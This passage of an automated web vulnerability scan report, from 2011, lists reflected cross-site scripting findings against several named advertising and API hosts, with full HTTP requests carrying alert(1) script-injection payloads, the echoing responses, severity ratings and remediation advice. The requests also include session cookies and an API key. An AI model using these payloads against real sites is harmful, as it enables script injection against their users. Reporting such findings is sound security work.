P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683579**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b539"-alert(1)-"67ea36dc1c6 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683560**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7423b"-alert(1)-"cb6a6387cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1682

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1">
...[SNIP]...

4.56. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0da"-alert(1)-"8c42b551633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&bf0da"-alert(1)-"8c42b551633=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; lifb=%y_Qs7i<Qa5p0/:

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:29:57 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:29:57 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&bf0da"-alert(1)-"8c42b551633=1&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fn%3B228957569%3B0%2d0%3B0%3B45421688%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Essc
...[SNIP]...

4.57. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 4d05c<script>alert(1)</script>0e5436c2494 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 15:29:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494)

4.58. http://api.bizographics.com/v1/profile.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 33b74<script>alert(1)</script>22bbeb83d65 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 02 Feb 2011 15:29:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KTissx4pIKRxvaj5XcunNcMDa7Re6IGD4lOuDZWVHyjN4Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAipIisFvtN4t4VEVUJBxdqAyBAisqZAs2SfkIE4k0isgs29d6PAF0Hy6gC0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 206
Connection: keep-alive

Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

4.59. https://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload af475<script>alert(1)</script>5b56c3fcd0c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 16:18:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: Close

Unknown API key: (6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c)

4.60. http://api.blogburst.com/EntityImageHandler.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /EntityImageHandler.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4387(a)c27091d8173 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /EntityImageHandler.ashxb4387(a)c27091d8173 HTTP/1.1
Host: api.blogburst.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 201

Error handler problem:
Error Number: B8BUa0w7Ilp7zBNRYRdWMLni
Error Path: /EntityImageHandler.ashxb4387(a)c27091d8173
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.61. http://api.blogburst.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80c92(a)e7e03c35472 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico80c92(a)e7e03c35472 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 19:10:36 GMT
Content-Length: 189

Error handler problem:
Error Number: B83sUW5V9btfzEZ9C74xOolh
Error Path: /favicon.ico80c92(a)e7e03c35472
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.62. http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryProxy.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5c81(a)8b15d9b73ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
